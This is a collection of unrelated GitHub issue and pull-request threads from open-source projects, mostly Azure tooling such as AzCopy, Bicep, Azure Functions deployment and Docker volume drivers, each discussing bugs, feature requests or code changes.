copy "C:\Users\marayerm\Desktop\*" "https://redacted.blob.core.windows.net/one/?REDACTED" --overwrite=false --follow-symlinks --recursive --fromTo=LocalBlob --include "New Text Document.txt;" --output=json
when there is no file at C:\Users\marayerm\Desktop\New Text Document.txt
What problem was encountered?
Although output=json was specified, the output I received was failed to perform copy command due to error: cannot start job due to error: nothing can be uploaded, please use --recursive to upload directories., which is not JSON. I have seen other situations where this happens, but this is the easiest to reproduce. Basically, if output=json is used, then all output should be formatted as JSON objects.
How can we reproduce the problem in the simplest way?
Try to do a copy where the source does not exist.
Have you found a mitigation/solution?
No.
@MRayermannMSFT thanks for reporting this issue!
I've logged it to be fixed.
Another scenario where this happens is when uploading an empty folder.
This also happens if you do not have permissions to read the contents of the blob container/file system.
Fixed in 10.0.8.
|
2025-04-01T06:36:45.543700
| 2017-08-30T19:41:47
|
254112916
|
{
"authors": [
"dnfclas",
"omkarmore83"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:372",
"repo": "Azure/azure-webjobs-sdk-script",
"url": "https://github.com/Azure/azure-webjobs-sdk-script/pull/1848"
}
|
gharchive/pull-request
|
Enabling TransferRequestHandler for all request
(This will include static content - The reason we do this is to enable us to have routes with period in them. i.e. with extensions)
Look at the issue #969
Essentially, Functions currently does not allow paths to have a period in them. for instance /index.html, etc etc. Proxies does allow users to have such paths. With Proxies merging with function this creates a problem. To enable such paths, we need to ensure that the manage module are executed for such path. There are a couple of way of enabling this as mentioned in the issue.
The change made here is a way of ensuring that TransferRequestHandler is invoked for all requests
@omkarmore83,
Thanks for having already signed the Contribution License Agreement. Your agreement was validated by .NET Foundation. We will now review your pull request.
Thanks,
.NET Foundation Pull Request Bot
|
2025-04-01T06:36:45.572107
| 2016-12-11T20:52:56
|
194855679
|
{
"authors": [
"ahmetalpbalkan",
"gjonespf",
"markvr",
"powareverb"
],
"license": "apache-2.0",
"license_source": "bigquery",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:373",
"repo": "Azure/azurefile-dockervolumedriver",
"url": "https://github.com/Azure/azurefile-dockervolumedriver/issues/78"
}
|
gharchive/issue
|
Containerize the volume plugin
Sure you're aware of, but thought I'd voice my interest after using this plugin on a few machines and really liking it.
Documented here:
https://docs.docker.com/engine/extend/plugin_api/
Has plugins running as "special" docker containers, brought up before docker proper and shut down after docker stops. Not sure of the impact of how they work on the fact you're using SMB tools/permissions/privileges. I think you're already using some of the ideas, so might not be an issue. Would make installing the plugin very simple and much cleaner however, when plugins come out of experimental.
@gjonespf we tried to containerize the driver, however the main problem is, the driver executes mount commands to mount SMB shares on Linux. When we containerize, the mounts are restricted to the container's namespace and therefore does not appear on the Linux host, thus not available to containers using the volumes. Last time I checked, this was a limitation of docker (or the Linux kernel).
If the situation has changed, we can take a look at containerizing the driver. BTW in the docs you sent, I don't see "running as special docker containers" reference. Could you please quote?
Indeed, wondered if this may be an issue. Would suggest that issue (containerized mounts) should be upstream on docker, as I'd expect having mount tools working correctly for plugins would be pretty critical for anything doing volume plugins based on mount. I raised the suggestion more as an easier way for people to install/update this driver. That being said, I'm at a loss to find much on docker plugin infra at all, and current suggestion (on the page I linked) is to run them outside of containers (as you're already doing).
Re: "special" containers - I believe I read it on some Weave documentation, I'm unable to find much on plugins as containers tbh.
Also unsure as to how these fit into the existing Kubernetes plugin infrastructure.
Oh, for ref here is how the Weave team is doing it. Looks like they've got separate Docker/CNI plugins.
https://github.com/weaveworks/weave/tree/master/plugin
Would suggest that issue (containerized mounts) should be upstream on docker
It's here:
https://github.com/docker/docker/issues/10088
https://github.com/docker/docker/issues/14630
https://github.com/docker/docker/issues/17034
Looks like it is merged now. Perhaps we should give it a try. This was the only reason we could not containerize the plugin back in the day.
Everything I read pretty much implies to me that volume plugins are still very experimental.
Volume plugins support have been out for pretty long and the API has gone many revisions, I think things have settled down at this point and we have a stable mechanism.
I'm changing the title to reflect the latest here.
Nice work, yeah those items look a good reflection. Experimental - agreed, it's been around for a year or two, just wasn't seeing much documentation to help you out. Expect if the mounts work, then it's "just" a case of sorting out how to build plugin api wrapper to handle mounting etc commands.
@ahmetb
hi, is this likely to happen please? I note the the "docker-for-azure" project has implemented this with their "cloudstor" plugin (https://docs.docker.com/docker-for-azure/persistent-data-volumes/) but that is only (officially) available if using that project, and it is closed source with minimal docs.
Enabling mounting Azure storage using docker plugin would be very useful. Otherwise it severely limits the use of Docker on Azure.
@markvr as @ahmetb is now working at Kubernetes would expect that it's not high on his priority list, and don't blame him. I'm still keen on this, but have started looking at other avenues to solve same problem. Docker plugin infra is finally maturing so would suggest it's getting easier for anyone to jump in and try this stuff out.
I would have hoped that Microsoft could have more than one person supporting their products. I like the open source approach they've taken with a lot of things, but they seem to just abandon a lot of them as well, which makes it impossible to know if we can rely on them for production systems.
|
2025-04-01T06:36:45.577046
| 2022-01-05T15:30:00
|
1094475031
|
{
"authors": [
"jackrichins",
"jeskew",
"jlichwa",
"tfitzmac"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:374",
"repo": "Azure/bicep-types-az",
"url": "https://github.com/Azure/bicep-types-az/issues/579"
}
|
gharchive/issue
|
Data property on Microsoft.KeyVault/vaults/keys defined as string but labeled with any
The Microsoft.KeyVault/vaults/keys resource type has a property called "data" within the "release_policy" object. In the swagger, it's defined as a string. But, it gets generated as "any".
This log entry may be relevant. The Swagger definition indicates that the data property should be base64-encoded bytes, and I'm not sure which Autorest type that would be translated into. The any type is used as a fallback when a field's type is not recognized.
It should be type string (it is just encoded string).
Examples here https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/template-functions-string#examples-2
The Bicep autorest plugin uses Autorest's ModelerFour framework, which applies a binary schema to base64 encoded strings. This seems appropriate for SDK generation, where the SDK would be responsible for taking a byte buffer and converting it to the expected wire format, but is probably not exactly what we want in Bicep.
@jlichwa If a user wants to supply a policy today in a Bicep or ARM JSON file, do they need to provide a base64-encoded string? I can put together a test if you don't know.
Yes, it needs to be a base64-encoded string.
|
2025-04-01T06:36:45.587339
| 2020-08-27T13:43:05
|
687254123
|
{
"authors": [
"JayDoubleu",
"Lddeiva",
"SPSamL",
"TazzyMan",
"alex-frankel",
"enbridgeint",
"jfe7",
"jikuja",
"sebader",
"sebbrochet",
"takekazuomi",
"thebeautiful",
"thebenwaters"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:375",
"repo": "Azure/bicep",
"url": "https://github.com/Azure/bicep/issues/363"
}
|
gharchive/issue
|
Support to split template into multiple files?
Have you thought about supporting splitting one bicep files into multiple files within the same directory and merging them on build?
I find this a very neat feature in terraform to make larger templates with many resources easier to read - without using modules, that is a different use case for me.
Like:
storageaccounts.bicep
sqldb.bicep
keyvault.bicep
bicep build .
==> my_combined_arm_template.json
Some use cases I would use splitting:
logic app templates
everything which is enter in template as escaped JSON string. E.g. Log Analytivs workbooks.
Splitting and loading bicep files would be very useful feature.
As well as functions to load external files and preparing payloads using the bicep language.
Similar to terraform:
local variables
file function
yaml and json decode/encode
Also it would allow for modularity.
Sure, merging local files is a good feature. Take it one step further and support remote git files. That way we can get versioning too. Versioning is a must if you use the bicep file like a module.
Seconding this and also liking to add that this would be nice with modules.
For readability it would be nice to seperate a module into a folder with
resource.bicep
params.bicep
variables.bicep
outputs.bicep
It's a bit unfortunate, ARM JSON files interpreters don't support natively JSON Pointer (RFC 6901) (while we could probably imagine a pre-processor addind it!).
I had recently to compose a lot of JSON "definition" files (of my own) into a single object structure before loading them in memory.
And JSON Pointer definitely helped me managing complexity while being able to check consistency as part of my unit tests.
BTW I was already toying with ARM JSON files generation a few years ago leveraging Jinja2 :)
But as it's only "syntactic macros", a lot of semantic issues are not detected as they should and are with something like Bicep...
This would be great if we could split out Bicep files like that!
Any news on this?
Like I said in issue #7726 I would then also like to add parameters and expressions (to do some string manipulation if needed) to add re-use value (predefined template files for several resources with all the properties that are always the same in your organization)
Good Ask....For me I want parameters in a file and remaining code in another file. is it possible?
I have n number of resources to create, so it will be good and traceable if we have different file param and different file for resources/modules
When using Terraform, this template was the initial setup of other organizations', or tenants', spoke subscription. It deployed a core set of resources to integrate with the common services/hub subscription. They're split mostly by resource type plus Data Sources (Existing resources in Bicep), outputs, providers, and variables (Bicep Parameters). It was deployed by the same team every time. Modules are overkill for the resource types with multiple instances because they had different requirements for configurations such as 3 different Key Vaults: 1 for Customer Managed Keys, 1 for Certificates, and another for Secrets. They each had a specific set of access for the service account creating them and their secrets/keys/certs and different network restrictions. I simplified it down to a handful of variables/parameters that were required for each to basically just the name and location. The *_permissions were the same for each tenant.
It's also easier for the team, which I've left, to maintain or update than as a single file which would be around 2000 lines of code.
@alex-frankel Is this still being considered? One of our customers is hitting the limit and wants to know if there are any solutions.
@lddeiva - it's not being actively considered. Having said that, I don't think if we implemented this it would address the limit you are talking about. I am assuming you are talking about the 4MB template size limit? We have a separate work item to try to get that limit raised.
Would be very nice to split up NSG rules, Sentinel rules or Firewall rules (1 rule = 1 file). Also Azure workbooks, as already mentioned.
|
2025-04-01T06:36:45.593311
| 2022-06-21T17:05:33
|
1278734445
|
{
"authors": [
"alex-frankel",
"anthony-c-martin",
"dairta"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:376",
"repo": "Azure/bicep",
"url": "https://github.com/Azure/bicep/issues/7317"
}
|
gharchive/issue
|
Bicep intellisense partially working
Bicep version
version 0.4.613
Describe the bug
typing res brings up intellisense options for resources
I cannot get intellisense to give me in between the quotes. Not specific to keyvaults.
typing resource kv '' should return Microsoft.Something/@date
Microsoft.KeyVault/vaults@2019-09-01
To Reproduce
install reinstall the vscode extension
Additional context
Once I get Microsoft.KeyVault/vaults@2019-09-01 loaded I get intellisense options for accesspolicies enablePurgeProtection enableRbacAuthorization and others.
@dairta, you're on a very old version of the Bicep extension. Could you try and repro this on the latest? (0.7.4)
uninstalling and reinstalling the 0.7.4 version still shows bicep --version
Bicep CLI version 0.4.613m My terminal launches in pwsh v7
I've looked at this and it's what I am experiencing on a new install.
https://github.com/Azure/bicep/issues/1780
The vs code extension and the bicep CLI are separate installs. Can you look at the version in VS code?
Also, separately, you also have two different versions of the bicep CLI installed. If that's not intention/desired, you can follow this to make sure you only have one:
https://docs.microsoft.com/en-us/azure/azure-resource-manager/bicep/installation-troubleshoot#multiple-versions-of-bicep-cli-installed
|
2025-04-01T06:36:45.595632
| 2022-11-11T15:57:22
|
1445673403
|
{
"authors": [
"SDanehy",
"alex-frankel"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:377",
"repo": "Azure/bicep",
"url": "https://github.com/Azure/bicep/issues/8987"
}
|
gharchive/issue
|
Bicept validation is wrong for Event Hub Namespace
When adding a new property to a "Microsoft.EventHub/namespaces@2022-01-01-preview" resource I get the following error:
The property "minimumTlsVersion" is not allowed on objects of type "EHNamespaceProperties". Permissible properties include "clusterArmId", "encryption", "privateEndpointConnections".
Per Microsoft's documentation this is a valid property. https://learn.microsoft.com/en-us/azure/templates/microsoft.eventhub/namespaces?pivots=deployment-language-bicep
Can you share the bicep code you are using? Is this throwing an error in VS code or when you attempt to deploy the bicep file?
Closing due to no response
|
2025-04-01T06:36:45.598448
| 2023-09-13T11:31:12
|
1894330923
|
{
"authors": [
"anthony-c-martin"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:378",
"repo": "Azure/bicep",
"url": "https://github.com/Azure/bicep/pull/11829"
}
|
gharchive/pull-request
|
Build workflow improvements
Add action to log preview install scripts
Summarize dotnet test results into single comment rather than 4 separate comments
Split VSCode into build & test jobs. This means you get a working VSCode package even if there are lint or test failures.
Microsoft Reviewers: Open in CodeFlow
Checks are all passing - there are just some required checks which have been renamed, which explains why the PR shows this:
|
2025-04-01T06:36:45.603291
| 2023-03-28T18:37:18
|
1644477505
|
{
"authors": [
"Aniruddh25",
"yorek"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:379",
"repo": "Azure/data-api-builder",
"url": "https://github.com/Azure/data-api-builder/issues/1374"
}
|
gharchive/issue
|
Add support for providing environment var/values in a .env file read by dotenv.net
Discussed in https://github.com/Azure/data-api-builder/discussions/1361
Originally posted by glaucia86 March 25, 2023
Hi!
I would like to propose that we can make use of the .env file in the dab.config.json file.
As it already happens with the files generated by the SWA CLI: staticwebapp.database.config.json (example: HERE)
Because the connection string is very exposed, where it has extremely sensitive data such as: login, password and database name.
This issue is to add support for .env so that I can just put my sensitive data into the .env, if I don't need the complexity of having multiple configuration files.
This is separate from the current @env() feature where we need to set environment variables on the system.
Two libraries for this option:
https://github.com/tonerdo/dotnet-env
https://github.com/bolorundurowb/dotenv.net
Looking forward to this! :)
|
2025-04-01T06:36:45.610277
| 2023-02-21T19:39:10
|
1594003996
|
{
"authors": [
"ashnamehrotra"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:380",
"repo": "Azure/eraser",
"url": "https://github.com/Azure/eraser/pull/639"
}
|
gharchive/pull-request
|
chore: cherry pick for v1.0.0
What this PR does / why we need it:
Cherry pick main changes since v1.0.0-rc.2 for v1.0.0 release.
(cherry picked #608 #618 #621 #620 #622 #628 #631 #632 #635)
Which issue(s) this PR fixes (optional, using fixes #<issue number>(, fixes #<issue_number>, ...) format, will close the issue(s) when the PR gets merged):
Fixes #
Special notes for your reviewer:
closing, fixed in PR #640
|
2025-04-01T06:36:45.621975
| 2024-03-04T22:52:00
|
2167930745
|
{
"authors": [
"mxmo0rhuhn",
"patelchandni",
"ricardolimadb"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:381",
"repo": "Azure/functions-action",
"url": "https://github.com/Azure/functions-action/issues/218"
}
|
gharchive/issue
|
No documented way to deploy to consumption based linux functions (e.g. Python)
By now I spend several days trying to figure out how to deploy a Python function to a consumption based plan using this action and I have come to the conclusion that this is not possible. However, there is no warning or any indication about this. Please add either a documentation how to do it or a warning that it is not possible.
Setup
Python is supported only on a Linux-based hosting plan when it's running in Azure.
source
Function App
Operating System:Linux
App Service Plan Pricing plan: Y1 (consumption based)
Runtime version: <IP_ADDRESS>
FUNCTIONS_WORKER_RUNTIME: python
FUNCTIONS_EXTENSION_VERSION: ~4
Action configuration
- name: 'Run Azure Functions Action'
uses: Azure/functions-action@v1
id: fa
with:
app-name: ${{ env.AZURE_FUNCTIONAPP_NAME }}
slot-name: ${{ env.AZURE_FUNCTIONAPP_SLOT }}
package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
publish-profile: ${{ secrets.AZURE_FUNCTIONAPP_PUBLISH_PROFILE }}
respect-funcignore: true
scm-do-build-during-deployment: true
enable-oryx-build: true
The action is exactly in line with the example. The slot-name has been added or removed but is irrelevant for the behaviour.
Repository structure
The repository contains a Hello world application using exactly the setup of the official documentation
Behaviour
In essence the problem boils down to the possible states of the WEBSITE_RUN_FROM_PACKAGE environment variable in the Azure Function.
Without WEBSITE_RUN_FROM_PACKAGE
A newly created Azure Function does not have the environment variable set. Therefore, the execution of the azure function fails.
Error: Failed to deploy web package to App Service.
Error: Execution Exception (state: PublishContent) (step: Invocation)
Error: When request Azure resource at PublishContent, zipDeploy : Failed to use /home/runner/work/_temp/temp_web_package_26238559607[44](XXXX)894.zip as ZipDeploy content
Error: Package deployment using ZIP Deploy failed. Refer logs for more details.
Error: Deployment Failed!
Btw. there is no indication where to find the logs that the error message is referring to in case of the failure. The link to the xxx.scm.azurewebsites.net logs is only displayed in case of a successful deployment .
With WEBSITE_RUN_FROM_PACKAGE = 1
In this case the GitHub action runs through without an error. However, the deployed function is not visible in the Azure Portal. This is somewhat expected behaviour as the documentation clearly states that Linux Consumption based Functions need to set the value to a URL:
External package URL is the only supported deployment method for Azure Functions running on Linux in the Consumption plan
Source
Other source
With WEBSITE_RUN_FROM_PACKAGE =
The expected solution is to set the WEBSITE_RUN_FROM_PACKAGE to a URL that is created during the deployment of the function using this GitHub Action e.g. the value of the SCM_RUN_FROM_PACKAGE variable. However, in this scenario the GitHub Action also fails:
Error: Execution Exception (state: PublishContent) (step: Invocation)
Error: When request Azure resource at PublishContent, zipDepoy : WEBSITE_RUN_FROM_PACKAGE in your function app is set to an URL. Please remove WEBSITE_RUN_FROM_PACKAGE app setting from your function app.
Error: Deployment Failed!
The suggested fix to remove the variable does unfortunately not work as stated above.
With WEBSITE_RUN_FROM_PACKAGE = anything else
For the sake of completeness I also tried to run the action with something else than the official options. As expected, the function fails with:
Error: Failed to deploy web package to App Service.
Error: Execution Exception (state: PublishContent) (step: Invocation)
Error: When request Azure resource at PublishContent, zipDeploy : Failed to use /home/runner/work/_temp/temp_web_package_5530634294070984.zip as ZipDeploy content
Error: Package deployment using ZIP Deploy failed. Refer logs for more details.
Error: Deployment Failed!
Conclusion
Given that none of the options results in a working Azure function I have to assume that it is just not possible to use this action for consumption based Linux functions. I would be more than happy if you could highlight my mistake.
WEBSITE_RUN_FROM_PACKAGE = 1 is not support of Linux app on Consumption plan. Documented here: https://learn.microsoft.com/en-us/azure/azure-functions/run-functions-from-deployment-package
WEBSITE_RUN_FROM_PACKAGE = URL will only work with this action if you are using service principle and not publish profile. Also, it will not support remote build.
If you want remote build, then used publish profile and pass remote build parameters with this action. Also, remove WEBSITE_RUN_FROM_PACKAGE app setting from your app.
Dear @patelchandni thanks a lot for summarizing the behaviour of WEBSITE_RUN_FROM_PACKAGE again.
Could you provide a working example of how to deploy a consumption based linux function with this action?
I have the same problem and I can't find a way to deploy in consumption mode (sku=Y1).
|
2025-04-01T06:36:45.624513
| 2023-05-01T17:37:42
|
1691106648
|
{
"authors": [
"Elsie4ever",
"digimaun"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:382",
"repo": "Azure/iot-plugandplay-models-tools",
"url": "https://github.com/Azure/iot-plugandplay-models-tools/pull/198"
}
|
gharchive/pull-request
|
Update dmr client to GA DTDL parser
Update dmr client to GA DTDL parser 1.0.52
And added a new test case according to Changes from Version 2 guildline
Resolving issue https://github.com/Azure/iot-plugandplay-models-tools/issues/197.
|
2025-04-01T06:36:45.632125
| 2018-10-26T05:22:25
|
374231054
|
{
"authors": [
"imatiach-msft",
"stevekuo4"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:383",
"repo": "Azure/mmlspark",
"url": "https://github.com/Azure/mmlspark/issues/411"
}
|
gharchive/issue
|
add weight to lightgmb
in our use case we need to include sample weight for model training, which is no available for LightGBMClassifier
this has been resolved with PR #426 , the fix will be in the next release of mmlspark v0.15. You can test out the fix with the build here:
--packages
com.microsoft.ml.spark:mmlspark_2.11:0.14.dev30+2.gb5960fb
and --repositories
https://mmlspark.azureedge.net/maven
|
2025-04-01T06:36:45.687624
| 2022-06-06T20:09:41
|
1262351679
|
{
"authors": [
"JohnathonMohr",
"lucas-lelis"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:384",
"repo": "Azure/template-analyzer",
"url": "https://github.com/Azure/template-analyzer/issues/246"
}
|
gharchive/issue
|
[BUG] Array of objects is not being evaluated correctly
Describe the bug
When trying to use a wildcard to evaluate an array of objects to validate if an object key exists in each array entry the rules are not evaluated properly:
{
"name": "resourceName",
"type": "Microsoft.Resources/deployments",
"apiVersion": "2021-04-01",
"resourceGroup": "resourceGroup",
"properties": {
"mode": "Incremental",
"templateLink": {
"id": "<Template-Link>"
},
"parameters": {
"secretsObject": {
"value": {
"secrets": [
{
"secretValue": "secret-value-1"
},
{
"secretValue": "secret-value-2"
}
]
}
}
}
}
}
Rule:
"evaluation": {
"resourceType": "Microsoft.Resources/deployments",
"allOf": [
{
"path": "properties.parameters.secretsObject.value.secrets[*].secretName",
"exists": true
}
]
}
Expected behavior
It should fail without the need to add a specific evaluation to each array entry:
"path": "properties.parameters.secretsObject.value.secrets[0].secretName"
"path": "properties.parameters.secretsObject.value.secrets[1].secretName"
Reproduction Steps
Run the tool against a template like the example above.
Environment
No response
Hi @lucas-lelis, thanks for the feedback.
Since wildcards are evaluated based on whether or not the full path resolves to an existing property, I believe the issue here is that the rule isn't returning anything to evaluate since the property in question doesn't exist, so it's skipped. This is somewhat mentioned in the rule authoring guide, but is not very clear on what's happening.
"When a wildcard is used, zero or more paths in the template will be found that match path. If zero paths are found, the operator in the Evaluation is skipped, as there is nothing to evaluate"
Can you try making a small modification to your rule and let us know if this works for you?
"evaluation": {
"resourceType": "Microsoft.Resources/deployments",
"allOf": [
{
"path": "properties.parameters.secretsObject.value.secrets[*]",
"allOf": [
{
"path" : "secretName",
"exists": true
}
]
}
]
}
The additional operator used for evaluating the remaining path after the wildcard isn't very intuitive, so I've created #247 to help with this.
Thx for the feedback @JohnathonMohr !
It did work as expected with those changes.
|
2025-04-01T06:36:45.690094
| 2024-07-12T03:11:28
|
2404557876
|
{
"authors": [
"mbilalamjad"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:385",
"repo": "Azure/terraform-azurerm-avm-res-compute-hostgroup",
"url": "https://github.com/Azure/terraform-azurerm-avm-res-compute-hostgroup/pull/31"
}
|
gharchive/pull-request
|
chore: repository governance
Repository governance update
This PR was automatically created by the AVM Team hive-mind using the grept governance tool.
We have detected that some files need updating to meet the AVM governance standards.
Please review and merge with alacrity.
Grept config source: git::https://github.com/Azure/Azure-Verified-Modules-Grept.git//terraform
Thanks! The AVM team :heart:
Supersceeded by #32
|
2025-04-01T06:36:45.704379
| 2024-09-14T04:26:34
|
2525985105
|
{
"authors": [
"ArcturusZhang",
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:388",
"repo": "Azure/typespec-azure",
"url": "https://github.com/Azure/typespec-azure/pull/1541"
}
|
gharchive/pull-request
|
[TCGC] update references for #1463
Update references after merged #1463
All changed packages have been documented.
:white_check_mark: @azure-tools/typespec-azure-resource-manager
:white_check_mark: @azure-tools/typespec-client-generator-core
Show changes
@azure-tools/typespec-azure-resource-manager - feature ✏️
x-ms-skip-url-encoding should be replaced with allowReserved
@azure-tools/typespec-client-generator-core - breaking ✏️
The kind for unknown renamed from any to unknown.,> 2. The values property in SdkUnionType renamed to variantTypes.,> 3. The values property in SdkTupleType renamed to valueTypes.,> 4. The example types for parameter, response and SdkType has been renamed to XXXExampleValue to emphasize that they are values instead of the example itself.,> 5. The @format decorator is no longer able to change the type of the property.
@azure-tools/typespec-client-generator-core - fix ✏️
Fix naming logic for anonymous model wrapped by HttpPart
@azure-tools/typespec-client-generator-core - breaking ✏️
no longer export the SdkExampleValueBase
You can try these changes here
🛝 Playground
🌐 Website
📚 Next docs
|
2025-04-01T06:36:45.707467
| 2020-11-07T23:09:10
|
738334495
|
{
"authors": [
"KYZITEMELOS93",
"itowlson"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:389",
"repo": "Azure/vscode-kubernetes-tools",
"url": "https://github.com/Azure/vscode-kubernetes-tools/issues/837"
}
|
gharchive/issue
|
Extension issue
Issue Type: Bug
Extension Name: vscode-kubernetes-tools
Extension Version: 1.2.1
OS Version: Windows_NT x64 10.0.17763
VSCode version: 1.51.0
:warning: We have written the needed data into your clipboard. Please paste! :warning:
Should be fixed in 1.2.3 - please reopen if not
Should be fixed in 1.2.3 - please reopen if not
|
2025-04-01T06:36:45.709719
| 2018-04-06T21:31:54
|
312125756
|
{
"authors": [
"brendandburns"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:390",
"repo": "Azure/vscode-kubernetes-tools",
"url": "https://github.com/Azure/vscode-kubernetes-tools/pull/162"
}
|
gharchive/pull-request
|
Add a drill-down for Pods created by a Deployment.
This goes straight from Deployment -> Pods
Another option would be:
Deployment -> ReplicaSet -> Pods
If we'd rather, easy to do, let me know.
Comments addressed, please re-check.
@testforstephen comment addressed, please re-check.
Thanks!
|
2025-04-01T06:36:45.712203
| 2020-05-27T10:35:12
|
625578786
|
{
"authors": [
"brentschmaltz",
"gislikonrad"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:391",
"repo": "AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet",
"url": "https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/pull/1424"
}
|
gharchive/pull-request
|
Fixes typo in RenewResponse action in WsTrust 1.3
There was a copy-paste error in one of the WsTrust 1.3 actions.
@gislikonrad I rebased on dev and squashed before I saw your pr, sorry. It is hard to see what your PR was now. Can you re-submit.
@gislikonrad I rebased on dev and squashed before I saw your pr, sorry. It is hard to see what your PR was now. Can you re-submit.
I merged my branch. Now you should be able to see the change. Do you still want me to resubmit the PR?
@gislikonrad thanks for catching this!
Sure
|
2025-04-01T06:36:45.721487
| 2019-03-26T20:25:43
|
425632081
|
{
"authors": [
"JPWilli",
"MarkZuber"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:392",
"repo": "AzureAD/microsoft-authentication-extensions-for-dotnet",
"url": "https://github.com/AzureAD/microsoft-authentication-extensions-for-dotnet/pull/9"
}
|
gharchive/pull-request
|
Jpwilli/locking
Adds locking to cache operations
Reverts projects to .net4.5
Upgrades projects to netcoreapp2.1 (redundant with Mark's other PR)
Adds tests
using System;
please add license blurb
Refers to: src/Shared/CrossPlatLock.cs:1 in d756837. [](commit_id = d756837b904e3e1c621279e3ffc719a5f2b5fce5, deletion_comment = False)
using System;
license
Refers to: tests/Microsoft.Identity.Extensions.Msal.UnitTests/MockTokenCache.cs:1 in d756837. [](commit_id = d756837b904e3e1c621279e3ffc719a5f2b5fce5, deletion_comment = False)
|
2025-04-01T06:36:45.768096
| 2016-07-27T08:04:57
|
167794905
|
{
"authors": [
"Kammy6679",
"prvijay",
"raeitan"
],
"license": "mit",
"license_source": "bigquery",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:393",
"repo": "AzureAD/rms-sdk-for-cpp",
"url": "https://github.com/AzureAD/rms-sdk-for-cpp/issues/119"
}
|
gharchive/issue
|
Cannot open the PPDF file, which is protected by RMS Android SDK
Protect a PDF file to PPDF file by RMS Android SDK
Open this PPDF by RMS Linux SDK
3 Get the a error message : This version is not supported.
Check the code, we found that the following functions have an exception error
ProtectedFileStream::Acquire
PS: Please use "catch (const rmscore::exceptions::RMSException& ex)" to get the exception
@prvijay , please take look this issue. Thank you.
@raeitan for investigation
Any update?
Hey,
I've updated the SDK to support pfile version 3 in the dev branch, please have a look and see if its working for you.
I'll need to run more tests before merging into master.
Thank you for pointing to the issue.
|
2025-04-01T06:36:45.792245
| 2022-01-21T19:13:40
|
1110804368
|
{
"authors": [
"cppcooper"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:394",
"repo": "BCCF-UBCO-AD/Orthanc-TMI",
"url": "https://github.com/BCCF-UBCO-AD/Orthanc-TMI/pull/93"
}
|
gharchive/pull-request
|
Review of Develop
It's time to merge into master. All this code needs review.
I was thinking once every two weeks, but it doesn't really matter so long as master build and works
|
2025-04-01T06:36:45.813974
| 2021-07-15T15:27:52
|
945506291
|
{
"authors": [
"BrianRamsay",
"tylerpar99"
],
"license": "BSD-3-Clause",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:395",
"repo": "BCStudentSoftwareDevTeam/celts",
"url": "https://github.com/BCStudentSoftwareDevTeam/celts/pull/47"
}
|
gharchive/pull-request
|
PR for Warning label track hours issue 45(This issue is based off of branch: track_volunteer_hours_issue42)
This PR fixes issue #45
Summary:
The issue asked that there be a way for an admin to tell that a participant that has checked into or rsvp to an event be flagged if they have not completed all prerequisites for the event. In order to achieve this, we queried the database and pushed on to a list of all the eventIDs that were set as prerequisites to the program the participant is attending. We then queried the database using the eventIDS and pushed onto a list all the users who attended any of the prerequisite events, using this list we then checked how many times a user name appeared and created a conditional that required the user to appear as many times as the length of the eventIDs list. If the user met the amount they would stay on the list, if the user did not they would be removed from the list. After deleting duplicates we then passed the list to the HTML and used jinja to flag any users who appeared on the track hours page who were not on the list of eligible participants.
To Test:
There is a test function in the test suite labeled test_warning.py. Running this should pass.
You can also visit the URL: http://<YOURIP>/<PROGRAMID>/<EVENTID>/track_hours. This URL will display a table with every user set to attend or currently at the event, if any of them have not met the requirements for the event you will see a red warning icon. Hovering over this will display a ToolTip that will tell you that the user has not completed the prerequisites.
Notes: This branch is forked off over the branch listed in the title. If any changes are made to the listed branch this will have to be updated.
There are conflicts to resolve
|
2025-04-01T06:36:45.820411
| 2017-05-12T23:48:11
|
228432579
|
{
"authors": [
"alex-hancock"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:396",
"repo": "BD2KGenomics/dcc-dashboard",
"url": "https://github.com/BD2KGenomics/dcc-dashboard/issues/22"
}
|
gharchive/issue
|
Display start time and last updated in action service table
See description. Opening branch feature/display-time to address.
@wshands Should I change out attributes for the timestamps, or should I just add two more columns?
